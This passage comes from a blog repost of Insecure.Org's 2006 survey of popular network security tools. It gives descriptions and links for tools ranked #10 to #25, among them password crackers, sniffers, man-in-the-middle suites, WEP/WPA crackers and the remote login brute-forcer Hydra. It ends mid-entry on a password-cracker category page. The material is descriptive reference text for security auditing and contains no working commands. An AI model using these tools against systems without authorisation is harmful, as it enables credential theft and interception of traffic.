href="http://www.oxid.it/ca_um/">well documented</a>. 
<p>See all <a href="http://sectools.org/crackers.html">password crackers</a>, and <a href="http://sectools.org/sniffers.html">packet sniffers</a> </p></td></tr></tbody></table><hr /><a name="john"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#10</span><br /><img src="http://mirror.sectools.org/flags/up_g_10x14.gif" width="10" height="14" /><span style="color:#008800;">1</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.openwall.com/john/"><img src="http://mirror.sectools.org/logos/john-80x163.png" align="right" border="0" width="80" height="163" /></a> <a href="http://www.openwall.com/john/">John the Ripper</a> : A powerful, flexible, and <i>fast</i> multi-platform password hash cracker<br />John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types which are most commonly found on various Unix flavors, as well as Kerberos AFS and Windows NT/2000/XP LM hashes. 
Several other hash types are added with contributed patches. You will want to start with some wordlists, which you can find <a href="ftp://ftp.mirrorgeek.com/openwall/wordlists">here</a>, <a href="ftp://ftp.ox.ac.uk/pub/wordlists/">here</a>, or <a href="http://www.outpost9.com/files/WordLists.html">here</a>. <p>See all <a href="http://sectools.org/crackers.html">password crackers</a> </p></td></tr></tbody></table><hr /><a name="ettercap"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#11</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">2</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://ettercap.sourceforge.net/"><img src="http://mirror.sectools.org/logos/ettercap-80x22.png" align="right" border="0" width="80" height="22" /></a> <a href="http://ettercap.sourceforge.net/">Ettercap</a> : In case you still thought switched LANs provide much extra security<br />Ettercap is a terminal-based network 
sniffer/interceptor/logger for ethernet LANs. It supports active and passive dissection of many protocols (even ciphered ones, like ssh and https). Data injection in an established connection and filtering on the fly is also possible, keeping the connection synchronized. Many sniffing modes were implemented to give you a powerful and complete sniffing suite. Plugins are supported. It has the ability to check whether you are in a switched LAN or not, and to use OS fingerprints (active or passive) to let you know the geometry of the LAN. <p>See all <a href="http://sectools.org/sniffers.html">packet sniffers</a> </p></td></tr></tbody></table><hr /><a name="nikto"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#12</span><br /><img src="http://mirror.sectools.org/flags/up_g_10x14.gif" width="10" height="14" /><span style="color:#008800;">4</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.cirt.net/nikto2"><img src="http://mirror.sectools.org/logos/nikto-80x98.png" align="right" border="0" width="80" height="98" /></a> <a href="http://www.cirt.net/nikto2">Nikto</a> : A more comprehensive web scanner<br />Nikto is an 
open source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired). It uses <a href="http://sectools.org/tools3.html#whisker-libwhisker">Whisker/libwhisker</a> for much of its underlying functionality. It is a great tool, but the value is limited by its infrequent updates. The newest and most critical vulnerabilities are often not detected. <p>See all <a href="http://sectools.org/web-scanners.html">web vulnerability scanners</a> </p></td></tr></tbody></table><hr /><a name="os-tools"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#13</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> Ping/telnet/dig/traceroute/whois/netstat : The basics<br />While there are many whiz-bang high-tech tools out there to assist in security auditing, don't forget about the basics! 
Everyone should be very familiar with these tools as they come with most operating systems (except that Windows omits whois and uses the name tracert). They can be very handy in a pinch, although for more advanced usage you may be better off with <a href="http://sectools.org/index.html#hping">Hping2</a> and <a href="http://sectools.org/index.html#netcat">Netcat</a>. </td></tr></tbody></table><hr /><a name="ssh"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#14</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">2</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <img src="http://mirror.sectools.org/logos/ssh-85x85.gif" align="right" border="0" width="85" height="85" /> <a href="http://www.openssh.com/">OpenSSH</a> / <a href="http://www.chiark.greenend.org.uk/%7Esgtatham/putty/">PuTTY</a> / <a href="http://www.ssh.com/commerce/index.html">SSH</a> : A secure way to access remote computers<br />SSH (Secure Shell) is the now ubiquitous program for logging into or executing commands on a remote machine. 
It provides secure encrypted communications between two untrusted hosts over an insecure network, replacing the hideously insecure telnet/rlogin/rsh alternatives. Most UNIX users run the open source <a href="http://www.openssh.com/">OpenSSH</a> server and client. Windows users often prefer the free <a href="http://www.chiark.greenend.org.uk/%7Esgtatham/putty/">PuTTY</a> client, which is also available for many mobile devices. Other Windows users prefer the nice terminal-based port of OpenSSH that comes with <a href="http://www.cygwin.com/">Cygwin</a>. Dozens of other free and proprietary clients exist. You can explore them <a href="http://freessh.org/">here</a> or <a href="http://linuxmafia.com/ssh/">here</a>. </td></tr></tbody></table><hr /><a name="hydra"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#15</span><br /><img src="http://mirror.sectools.org/flags/up_g_10x14.gif" width="10" height="14" /><span style="color:#008800;">35</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a 
href="http://www.thc.org/thc-hydra/"><img src="http://mirror.sectools.org/logos/hydra-80x79.png" align="right" border="0" width="80" height="79" /></a> <a href="http://www.thc.org/thc-hydra/">THC Hydra</a> : A Fast network authentication cracker which supports many different services<br />When you need to brute force crack a remote authentication service, Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 30 protocols, including telnet, ftp, http, https, smb, several databases, and much more. Like <a href="http://sectools.org/index.html#amap">THC Amap</a> this release is from the fine folks at <a href="http://www.thc.org/">THC</a>. <p>See all <a href="http://sectools.org/crackers.html">password crackers</a> </p></td></tr></tbody></table><hr /><a name="paros"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#16</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a
href="http://www.parosproxy.org/"><img src="http://mirror.sectools.org/logos/paros-80x41.png" align="right" border="0" width="80" height="41" /></a> <a href="http://www.parosproxy.org/">Paros proxy</a> : A web application vulnerability assessment proxy<br />A Java based web proxy for assessing web application vulnerability. It supports editing/viewing HTTP/HTTPS messages on-the-fly to change items such as cookies and form fields. It includes a web traffic recorder, web spider, hash calculator, and a scanner for testing common web application attacks such as SQL injection and cross-site scripting. <p>See all <a href="http://sectools.org/web-scanners.html">web vulnerability scanners</a> </p></td></tr></tbody></table><hr /><a name="dsniff"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#17</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">10</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.monkey.org/%7Edugsong/dsniff/"><img src="http://mirror.sectools.org/logos/dsniff-80x96.png" align="right" border="0" width="80" height="96" /></a> <a 
href="http://www.monkey.org/%7Edugsong/dsniff/">Dsniff</a> : A suite of powerful network auditing and penetration-testing tools<br />This popular and well-engineered suite by Dug Song includes many tools. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.). arpspoof, dnsspoof, and macof facilitate the interception of network traffic normally unavailable to an attacker (e.g., due to layer-2 switching). sshmitm and webmitm implement active monkey-in-the-middle attacks against redirected ssh and https sessions by exploiting weak bindings in ad-hoc PKI. A separately maintained partial Windows port is available <a href="http://www.datanerds.net/%7Emike/dsniff.html">here</a>. Overall, this is a great toolset. It handles pretty much all of your password sniffing needs. <p>See all <a href="http://sectools.org/sniffers.html">packet sniffers</a> </p></td></tr></tbody></table><hr /><a name="netstumbler"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#18</span><br /><img src="http://mirror.sectools.org/flags/up_g_10x14.gif" width="10" height="14" /><span style="color:#008800;">7</span><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.stumbler.net/"><img src="http://mirror.sectools.org/logos/netstumbler-80x26.png" align="right" border="0" width="80" height="26" /></a> <a href="http://www.stumbler.net/">NetStumbler</a> : Free Windows 802.11 Sniffer<br />Netstumbler is the best known Windows tool for finding open wireless access points ("wardriving"). They also distribute a WinCE version for PDAs and such named <a href="http://www.stumbler.net/">Ministumbler</a>. 
The tool is currently free but Windows-only and no source code is provided. It uses a more active approach to finding WAPs than passive sniffers such as <a href="http://sectools.org/index.html#kismet">Kismet</a> or <a href="http://sectools.org/tools3.html#kismac">KisMAC</a>. <p>See all <a href="http://sectools.org/wireless.html">wireless tools</a>, and <a href="http://sectools.org/sniffers.html">packet sniffers</a> </p></td></tr></tbody></table><hr /><a name="amap"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#19</span><br /><img src="http://mirror.sectools.org/flags/up_g_10x14.gif" width="10" height="14" /><span style="color:#008800;">18</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.thc.org/thc-amap/"><img src="http://mirror.sectools.org/logos/amap-80x79.png" align="right" border="0" width="80" height="79" /></a> <a href="http://www.thc.org/thc-amap/">THC Amap</a> : An application fingerprinting scanner<br />Amap is a great tool for determining what application is listening on a given port. 
Their database isn't as large as what <a href="http://insecure.org/nmap/">Nmap</a> uses for its <a href="http://insecure.org/nmap/vscan/">version detection</a> feature, but it is definitely worth trying for a 2nd opinion or if Nmap fails to detect a service. Amap even knows how to parse Nmap output files. This is yet another valuable tool from the great guys at <a href="http://www.thc.org/">THC</a>. <p>See all <a href="http://sectools.org/app-scanners.html">application-specific scanners</a> </p></td></tr></tbody></table><hr /><a name="gfi"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#20</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">12</span><br /><img src="http://mirror.sectools.org/flags/dollarlogo_20x30.gif" alt="Costs money" title="Costs money" width="20" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.gfi.com/lannetscan/"><img src="http://mirror.sectools.org/logos/gfi-70x28.png" align="right" border="0" width="70" height="28" /></a> <a href="http://www.gfi.com/lannetscan/">GFI LANguard</a> : A commercial network security scanner for Windows<br />GFI LANguard scans IP networks to detect what machines are running. Then it tries to discern the host OS and what applications are running. It also tries to collect each Windows machine's service pack level, missing security patches, wireless access points, USB devices, open shares, open ports, services/applications active on the computer, key registry entries, weak passwords, users and groups, and more. Scan results are saved to an HTML report, which can be customized/queried. 
It also includes a patch manager which detects and installs missing patches. A free trial version is available, though it only works for up to 30 days. <p>See all <a href="http://sectools.org/vuln-scanners.html">vulnerability scanners</a> </p></td></tr></tbody></table><hr /><a name="aircrack"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#21</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.aircrack-ng.org/"><img src="http://mirror.sectools.org/logos/aircrack-80x63.png" align="right" border="0" width="80" height="63" /></a> <a href="http://www.aircrack-ng.org/">Aircrack</a> : The fastest available WEP/WPA cracking tool<br />Aircrack is a suite of tools for 802.11a/b/g WEP and WPA cracking. It can recover a 40 through 512-bit WEP key once enough encrypted packets have been gathered. It can also attack WPA 1 or 2 networks using advanced cryptographic methods or by brute force. 
The suite includes airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files). <p>See all <a href="http://sectools.org/wireless.html">wireless tools</a>, and <a href="http://sectools.org/crackers.html">password crackers</a> </p></td></tr></tbody></table><hr /><a name="superscan"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#22</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">4</span><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.foundstone.com/us/resources/proddesc/superscan.htm">Superscan</a> : A Windows-only port scanner, pinger, and resolver<br />SuperScan is a free Windows-only closed-source TCP/UDP port scanner by Foundstone. It includes a variety of additional networking tools such as ping, traceroute, http head, and whois. 
<p>See all <a href="http://sectools.org/port-scanners.html">port scanners</a> </p></td></tr></tbody></table><hr /><a name="netfilter"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#23</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">2</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.netfilter.org/"><img src="http://mirror.sectools.org/logos/netfilter-80x21.png" align="right" border="0" width="80" height="21" /></a> <a href="http://www.netfilter.org/">Netfilter</a> : The current Linux kernel packet filter/firewall<br />Netfilter is a powerful packet filter implemented in the standard Linux kernel. The userspace iptables tool is used for configuration. It now supports packet filtering (stateless or stateful), all kinds of network address and port translation (NAT/NAPT), and multiple API layers for 3rd party extensions. It includes many different modules for handling unruly protocols such as FTP. For other UNIX platforms, see <a href="http://sectools.org/tools3.html#openbsd-pf">OpenBSD PF</a> (OpenBSD specific), or <a href="http://sectools.org/tools4.html#ipfilter">IP Filter</a>. Many <a href="http://en.wikipedia.org/wiki/Personal_firewall">personal firewalls</a> are available for Windows (<a href="http://www.tinysoftware.com/">Tiny</a>, <a href="http://www.zonelabs.com/">Zone Alarm</a>, <a href="http://sectools.org/index.html">Norton</a>, <a href="http://www.kerio.com/">Kerio</a>, ...), though none made this list. 
Microsoft included a very basic firewall in Windows XP SP2, and will nag you incessantly until you install it. <p>See all <a href="http://sectools.org/firewalls.html">firewalls</a> </p></td></tr></tbody></table><hr /><a name="sysinternals"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#24</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.microsoft.com/technet/sysinternals/default.mspx">Sysinternals</a> : An extensive collection of powerful Windows utilities<br />Sysinternals provides many small Windows utilities that are quite useful for low-level Windows hacking. Some are free of cost and/or include source code, while others are proprietary. Survey respondents were most enamored with: <ul><li><a href="http://www.microsoft.com/technet/sysinternals/utilities/ProcessExplorer.mspx">ProcessExplorer</a> for keeping an eye on the files and directories open by any process (like <a href="http://sectools.org/tools2.html#lsof">LSoF</a> on UNIX). </li><li><a href="http://www.microsoft.com/technet/sysinternals/utilities/PsTools.mspx">PsTools</a> for managing (executing, suspending, killing, detailing) local and remote processes. </li><li><a href="http://www.microsoft.com/technet/sysinternals/utilities/Autoruns.mspx">Autoruns</a> for discovering what executables are set to run during system boot up or login. 
</li><li><a href="http://www.microsoft.com/technet/sysinternals/utilities/RootkitRevealer.mspx">RootkitRevealer</a> for detecting registry and file system API discrepancies that may indicate the presence of a user-mode or kernel-mode rootkit. </li><li><a href="http://www.microsoft.com/technet/sysinternals/utilities/TcpView.mspx">TCPView</a>, for viewing TCP and UDP traffic endpoints used by each process (like Netstat on UNIX). </li></ul> <b>Update:</b> Microsoft <a href="http://www.winternals.com/Company/PressRelease92.aspx">acquired Sysinternals</a> in July 2006, <a href="http://www.winternals.com/Company/PressRelease92.aspx">promising</a> that “Customers will be able to continue building on Sysinternals' advanced utilities, technical information and source code”. Less than four months later, Microsoft <a href="http://seclists.org/dailydave/2006/q4/0134.html">removed</a> most of that source code. Future product direction is uncertain. <p>See all <a href="http://sectools.org/rootkit-detectors.html">rootkit detectors</a> </p></td></tr></tbody></table><hr /><a name="retina"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#25</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">5</span><br /><img src="http://mirror.sectools.org/flags/dollarlogo_20x30.gif" alt="Costs money" title="Costs money" width="20" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.eeye.com/html/Products/Retina/index.html"><img src="http://mirror.sectools.org/logos/retina-106x48.png" align="right" border="0" width="106" height="48" /></a> <a href="http://www.eeye.com/html/Products/Retina/index.html">Retina</a> : 
Commercial vulnerability assessment scanner by eEye<br />Like <a href="http://sectools.org/index.html#nessus">Nessus</a>, Retina's function is to scan all the hosts on a network and report on any vulnerabilities found. It was written by <a href="http://www.eeye.com/">eEye</a>, who are well known for their <a href="http://www.eeye.com/html/research/index.html">security research</a>. <p>See all <a href="http://sectools.org/vuln-scanners.html">vulnerability scanners</a> </p></td></tr></tbody></table>Praba.... a Hacker......http://www.blogger.com/profile/17884637785245594852noreply@blogger.com0tag:blogger.com,1999:blog-531974719972011792.post-90052221781212575912009-07-29T05:12:00.000-07:002009-07-29T05:23:50.200-07:00Top 10 Password Crackers<p>After the tremendously successful <a href="http://sectools.org/tools2000.html">2000</a> and <a href="http://sectools.org/tools2003.html">2003</a> security tools surveys, <a href="http://www.insecure.org/">Insecure.Org</a> is delighted to release this 2006 survey. I (<a href="http://insecure.org/fyodor/">Fyodor</a>) asked users from the <a href="http://seclists.org/#nmap-hackers">nmap-hackers</a> mailing list to share their favorite tools, and 3,243 people responded. This allowed me to expand the list to 100 tools, and even subdivide them into categories. <b>This is the category page for password crackers</b> -- the full network security list is <a href="http://sectools.org/index.html">available here</a>. Anyone in the security field would be well advised to go over the list and investigate tools they are unfamiliar with. I discovered several powerful new tools this way. I also point newbies to this site whenever they write me saying “I don't know where to start”. </p><p>Respondents were allowed to list open source or commercial tools on any platform. Commercial tools are noted as such in the list below. 
No votes for the <a href="http://insecure.org/nmap/">Nmap Security Scanner</a> were counted because the survey was taken on an Nmap mailing list. This audience also biases the list slightly toward “attack” hacking tools rather than defensive ones. </p><p>Each tool is described by one or more attributes: <table> <tbody><tr><td align="center"><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" title="New" width="28" height="11" /></td><td valign="center">Did not appear on the <a href="http://sectools.org/tools2003.html">2003 list</a></td></tr> <tr><td align="center"><img src="http://mirror.sectools.org/flags/dollarlogo_20x30.gif" alt="Costs money" title="Costs money" width="20" height="30" /></td><td valign="center">Generally costs money. A free limited/demo/trial version may be available.</td></tr> <tr><td align="center"><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /></td><td valign="center">Works natively on Linux</td></tr> <tr><td align="center"><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /></td><td valign="center">Works natively on OpenBSD, FreeBSD, Solaris, and/or other UNIX variants</td></tr> <tr><td align="center"><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /></td><td valign="center">Works natively on Apple Mac OS X</td></tr> <tr><td align="center"><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /></td><td valign="center">Works natively on Microsoft Windows</td></tr> <tr><td align="center"><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /></td><td valign="center">Features a command-line interface</td></tr> <tr><td align="center"><img
src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /></td><td valign="center">Offers a GUI (point and click) interface</td></tr> <tr><td align="center"><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /></td><td valign="center">Source code available for inspection.</td></tr> </tbody></table> </p>Please send updates and suggestions (or better tool logos) to <a href="mailto:fyodor@insecure.org">Fyodor</a>. If your tool is featured or you think your site visitors might enjoy this list, you are welcome to use our <a href="http://sectools.org/banners.html">link banners</a>. Here is the list, starting with the most popular:<br /><br /><span style="font-size:+1;">#1</span><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> <a href="http://www.oxid.it/cain.html"><img src="http://mirror.sectools.org/logos/cain-80x32.png" align="right" border="0" width="80" height="32" /></a> <a href="http://www.oxid.it/cain.html">Cain and Abel</a> : The top password recovery tool for Windows<br />UNIX users often smugly assert that the best free security tools support their platform first, and Windows ports are often an afterthought. They are usually right, but Cain & Abel is a glaring exception. This Windows-only password recovery tool handles an enormous variety of tasks. It can recover passwords by sniffing the network, cracking encrypted passwords using 